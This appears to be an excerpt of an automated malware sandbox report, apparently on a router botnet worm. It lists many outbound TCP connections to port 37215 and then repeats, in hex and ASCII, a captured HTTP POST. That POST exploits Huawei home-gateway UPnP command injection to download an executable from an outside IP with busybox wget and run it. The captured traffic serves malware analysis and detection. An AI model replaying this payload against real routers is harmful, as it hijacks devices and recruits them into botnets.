              Source: global trafficTCP traffic: 192.168.2.14:12603 -> 156.54.217.201:37215
              Source: global trafficTCP traffic: 192.168.2.14:12603 -> 197.211.188.140:37215
              Source: global trafficTCP traffic: 192.168.2.14:12603 -> 156.163.205.146:37215
              Source: global trafficTCP traffic: 192.168.2.14:12603 -> 41.98.61.143:37215
              Source: global trafficTCP traffic: 192.168.2.14:12603 -> 41.65.174.17:37215
              Source: global trafficTCP traffic: 192.168.2.14:12603 -> 156.120.136.106:37215
              Source: global trafficTCP traffic: 192.168.2.14:12603 -> 197.123.199.173:37215
              Source: global trafficTCP traffic: 192.168.2.14:12603 -> 197.240.118.14:37215
              Source: global trafficTCP traffic: 192.168.2.14:12603 -> 41.21.160.81:37215
              Source: global trafficTCP traffic: 192.168.2.14:12603 -> 156.224.169.27:37215
              Source: global trafficTCP traffic: 192.168.2.14:12603 -> 197.83.13.143:37215
              Source: global trafficTCP traffic: 192.168.2.14:12603 -> 156.213.239.62:37215
              Source: global trafficTCP traffic: 192.168.2.14:12603 -> 156.37.50.204:37215
              Source: global trafficTCP traffic: 192.168.2.14:12603 -> 41.33.8.207:37215
              Source: global trafficTCP traffic: 192.168.2.14:12603 -> 41.111.248.138:37215
              Source: global trafficTCP traffic: 192.168.2.14:12603 -> 156.61.146.33:37215
              Source: global trafficTCP traffic: 192.168.2.14:12603 -> 41.238.178.125:37215
              Source: global trafficTCP traffic: 192.168.2.14:12603 -> 41.216.103.155:37215
              Source: global trafficTCP traffic: 192.168.2.14:12603 -> 41.123.118.96:37215
              Source: global trafficTCP traffic: 192.168.2.14:12603 -> 41.76.84.215:37215
              Source: global trafficTCP traffic: 192.168.2.14:12603 -> 197.96.113.72:37215
              Source: global trafficTCP traffic: 192.168.2.14:12603 -> 197.147.146.83:37215
              Source: global trafficTCP traffic: 192.168.2.14:12603 -> 197.246.30.204:37215
              Source: global trafficTCP traffic: 192.168.2.14:12603 -> 197.75.113.17:37215
              Source: global trafficTCP traffic: 192.168.2.14:12603 -> 197.55.189.64:37215
              Source: global trafficTCP traffic: 192.168.2.14:12603 -> 41.126.99.219:37215
              Source: global trafficTCP traffic: 192.168.2.14:12603 -> 41.8.160.187:37215
              Source: global trafficTCP traffic: 192.168.2.14:12603 -> 197.174.140.61:37215
              Source: global trafficTCP traffic: 192.168.2.14:12603 -> 197.218.136.82:37215
              Source: global trafficTCP traffic: 192.168.2.14:12603 -> 197.247.104.150:37215
              Source: global trafficTCP traffic: 192.168.2.14:12603 -> 156.173.31.239:37215
              Source: global trafficTCP traffic: 192.168.2.14:12603 -> 197.193.195.181:37215
              Source: global trafficTCP traffic: 192.168.2.14:12603 -> 156.218.212.198:37215
              Source: global trafficTCP traffic: 192.168.2.14:12603 -> 197.163.91.156:37215
              Source: global trafficTCP traffic: 192.168.2.14:12603 -> 41.222.79.249:37215
              Source: global trafficTCP traffic: 192.168.2.14:12603 -> 41.176.89.80:37215
              Source: global trafficTCP traffic: 192.168.2.14:12603 -> 41.27.151.191:37215
              Source: global trafficTCP traffic: 192.168.2.14:12603 -> 156.235.26.115:37215
              Source: global trafficTCP traffic: 192.168.2.14:12603 -> 197.38.216.70:37215
              Source: global trafficTCP traffic: 192.168.2.14:12603 -> 156.170.117.106:37215
              Source: global trafficTCP traffic: 192.168.2.14:12603 -> 156.149.160.150:37215
              Source: global trafficTCP traffic: 192.168.2.14:12603 -> 41.61.251.84:37215
              Source: global trafficTCP traffic: 192.168.2.14:12603 -> 156.233.113.8:37215
              Source: global trafficTCP traffic: 192.168.2.14:12603 -> 197.219.108.12:37215
              Source: global trafficTCP traffic: 192.168.2.14:12603 -> 197.218.26.77:37215
              Source: global trafficTCP traffic: 192.168.2.14:12603 -> 197.197.236.157:37215
              Source: global trafficTCP traffic: 192.168.2.14:12603 -> 41.49.251.135:37215
              Source: global trafficTCP traffic: 192.168.2.14:12603 -> 41.139.192.174:37215
              Source: global trafficTCP traffic: 192.168.2.14:12603 -> 41.113.80.124:37215
              Source: global trafficTCP traffic: 192.168.2.14:12603 -> 41.224.180.170:37215
              Source: global trafficTCP traffic: 192.168.2.14:12603 -> 41.15.76.55:37215
              Source: global trafficTCP traffic: 192.168.2.14:12603 -> 156.138.63.195:37215
              Source: global trafficTCP traffic: 192.168.2.14:12603 -> 156.182.28.169:37215
              Source: global trafficTCP traffic: 192.168.2.14:12603 -> 41.30.80.56:37215
              Source: global trafficTCP traffic: 192.168.2.14:12603 -> 197.32.105.53:37215
              Source: global trafficTCP traffic: 192.168.2.14:12603 -> 197.187.119.218:37215
              Source: global trafficTCP traffic: 192.168.2.14:12603 -> 41.66.137.208:37215
              Source: global trafficTCP traffic: 192.168.2.14:12603 -> 156.198.106.25:37215
              Source: global trafficTCP traffic: 192.168.2.14:12603 -> 156.122.245.105:37215
              Source: global trafficTCP traffic: 192.168.2.14:12603 -> 156.232.82.26:37215
              Source: global trafficTCP traffic: 192.168.2.14:12603 -> 156.142.178.67:37215
              Source: global trafficTCP traffic: 192.168.2.14:12603 -> 197.82.250.24:37215
              Source: global trafficTCP traffic: 192.168.2.14:12603 -> 41.80.177.106:37215
              Source: global trafficTCP traffic: 192.168.2.14:12603 -> 156.73.105.50:37215
              Source: global trafficTCP traffic: 192.168.2.14:12603 -> 156.18.127.190:37215
              Source: global trafficTCP traffic: 192.168.2.14:12603 -> 197.117.47.205:37215
              Source: global trafficTCP traffic: 192.168.2.14:12603 -> 156.179.174.190:37215
              Source: global trafficTCP traffic: 192.168.2.14:12603 -> 156.61.117.129:37215
              Source: global trafficTCP traffic: 192.168.2.14:12603 -> 197.182.139.161:37215
              Source: global trafficTCP traffic: 192.168.2.14:12603 -> 197.56.148.57:37215
              Source: global trafficTCP traffic: 192.168.2.14:12603 -> 197.5.170.219:37215
              Source: global trafficTCP traffic: 192.168.2.14:12603 -> 156.214.63.184:37215
              Source: global trafficTCP traffic: 192.168.2.14:12603 -> 41.100.29.197:37215
              Source: global trafficTCP traffic: 192.168.2.14:12603 -> 197.229.234.84:37215
              Source: global trafficTCP traffic: 192.168.2.14:12603 -> 197.71.57.52:37215
              Source: global trafficTCP traffic: 192.168.2.14:12603 -> 197.214.16.192:37215
              Source: global trafficTCP traffic: 192.168.2.14:12603 -> 156.254.10.207:37215
              Source: global trafficTCP traffic: 192.168.2.14:12603 -> 197.195.65.209:37215
              Source: global trafficTCP traffic: 192.168.2.14:12603 -> 197.69.12.126:37215
              Source: global trafficTCP traffic: 192.168.2.14:12603 -> 41.195.47.241:37215
              Source: global trafficTCP traffic: 192.168.2.14:12603 -> 156.79.106.58:37215
              Source: global trafficTCP traffic: 192.168.2.14:12603 -> 41.59.199.97:37215
              Source: global trafficTCP traffic: 192.168.2.14:12603 -> 156.52.146.119:37215
              Source: global trafficTCP traffic: 192.168.2.14:12603 -> 41.135.131.164:37215
              Source: global trafficTCP traffic: 192.168.2.14:12603 -> 41.248.134.251:37215
              Source: global trafficTCP traffic: 192.168.2.14:12603 -> 156.107.63.120:37215
              Source: global trafficTCP traffic: 192.168.2.14:12603 -> 41.189.211.206:37215
              Source: global trafficTCP traffic: 192.168.2.14:12603 -> 197.208.79.238:37215
              Source: global trafficTCP traffic: 192.168.2.14:12603 -> 41.191.223.228:37215
              Source: global trafficTCP traffic: 192.168.2.14:12603 -> 41.37.97.58:37215
              Source: global trafficTCP traffic: 192.168.2.14:12603 -> 197.126.143.178:37215
              Source: global trafficTCP traffic: 192.168.2.14:12603 -> 156.119.120.12:37215
              Source: global trafficTCP traffic: 192.168.2.14:12603 -> 41.128.90.49:37215
              Source: global trafficTCP traffic: 192.168.2.14:12603 -> 197.2.27.218:37215
              Source: global trafficTCP traffic: 192.168.2.14:12603 -> 197.111.190.191:37215
              Source: global trafficTCP traffic: 192.168.2.14:12603 -> 41.77.195.149:37215
              Source: global trafficTCP traffic: 192.168.2.14:12603 -> 197.25.6.232:37215
              Source: global trafficTCP traffic: 192.168.2.14:12603 -> 156.17.97.42:37215
              Source: global trafficTCP traffic: 192.168.2.14:12603 -> 197.49.72.102:37215
              Source: global trafficTCP traffic: 192.168.2.14:12603 -> 41.116.41.50:37215
              Source: global trafficTCP traffic: 192.168.2.14:12603 -> 156.126.25.234:37215
              Source: global trafficTCP traffic: 192.168.2.14:12603 -> 197.48.44.114:37215
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 38 32 2e 33 38 2e 39 34 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.82.38.94 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 38 32 2e 33 38 2e 39 34 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.82.38.94 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 38 32 2e 33 38 2e 39 34 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.82.38.94 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 38 32 2e 33 38 2e 39 34 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.82.38.94 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 38 32 2e 33 38 2e 39 34 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.82.38.94 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 38 32 2e 33 38 2e 39 34 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.82.38.94 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 38 32 2e 33 38 2e 39 34 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.82.38.94 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * 